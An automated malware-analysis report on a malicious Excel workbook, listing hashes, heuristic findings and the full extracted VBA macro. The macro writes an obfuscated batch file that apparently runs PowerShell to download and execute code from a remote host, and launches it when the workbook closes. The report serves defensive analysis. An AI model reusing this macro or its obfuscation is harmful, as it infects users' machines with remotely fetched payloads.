Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5a8fda8c26a1976d…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 22.4 KB
Created: 2015-06-05 18:19:34 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-05-22
MD5: 873daff18f021524f07eea52ff6c8ca8
SHA-1: 18596c67536056f3d70ca2bc9409a16c020dfac2
SHA-256: 5a8fda8c26a1976d8cb944ffe7680838e28ce39472b0f9481041cdd4b3573472
Risk Score: 208

Heuristics (6)

  • OOXML_VBA [medium] (5 related findings): VBA project inside OOXML
    Document contains a VBA project (VBA macros present).
  • OLE_VBA_SHELL [critical]: Shell() call in VBA
    Shell() call in VBA.
  • OLE_VBA_WBOPEN [high]: Workbook_Open macro
    Workbook_Open macro (auto-executes when the workbook is opened).
  • OLE_VBA_CMD [high]: cmd.exe reference in VBA
    cmd.exe reference in VBA.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC [high]: VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_VBA_ENVIRON [low]: Environ() call (environment variable access)
    Environ() call (environment variable access).

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1829 bytes
SHA-256: 2f9291e5969e42f3eebecca091d42e641617a3bbace4349e3366e932befaa3dd
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "EstaPastaDeTrabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()

 
   Dim sFile As String
   
   sFile = Environ("Public") & "\Docs.bat"
      
   Close
   

   Open sFile For Output As #1
   Print #1, "@echo off"
   Print #1, "Set abf=uOqd50k1ta8mgNG9xSDHTy2v7ErLsYFXMjKbnlf34iwCPeIzQUZJ6VhBAcpRoW"
   Print #1, "cls"
   Print #1, "%abf:~57,1%%abf:~11,1%%abf:~3,1% /%abf:~57,1% %abf:~28,1%%abf:~8,1%%abf:~9,1%%abf:~26,1%%abf:~8,1% /%abf:~11,1%%abf:~41,1%%abf:~36,1% %abf:~44,1%%abf:~60,1%%abf:~42,1%%abf:~45,1%%abf:~26,1%%abf:~17,1%%abf:~54,1%%abf:~45,1%%abf:~37,1%%abf:~37,1% -%abf:~45,1%%abf:~16,1% %abf:~55,1%%abf:~21,1%%abf:~58,1%%abf:~9,1%%abf:~28,1%%abf:~28,1% -%abf:~36,1%%abf:~1,1%%abf:~58,1% -%abf:~42,1% %abf:~7,1% %abf:~41,1%'%abf:~45,1%'%abf:~16,1%(%abf:~41,1%%abf:~42,1%%abf:~26,1%('%abf:~54,1%%abf:~8,1%%abf:~8,1%%abf:~58,1%://%abf:~38,1%%abf:~9,1%%abf:~57,1%%abf:~45,1%%abf:~16,1%%abf:~8,1%%abf:~26,1%%abf:~9,1%%abf:~3,1%%abf:~45,1%.%abf:~57,1%%abf:~60,1%%abf:~11,1%.%abf:~35,1%%abf:~26,1%/%abf:~47,1%.%abf:~11,1%%abf:~58,1%%abf:~39,1%'))"

  
      
   'sFile
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)
   
   Shell$ _
"cmd /c ping -n 15 127.0.0.1 & %public%\Docs.bat exit" & vbLf, 0
End Sub



Attribute VB_Name = "Planilha1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 15360 bytes
SHA-256: b90560ab147a6ec32db7121e37758f28b527cf00134777067377b165bfce8088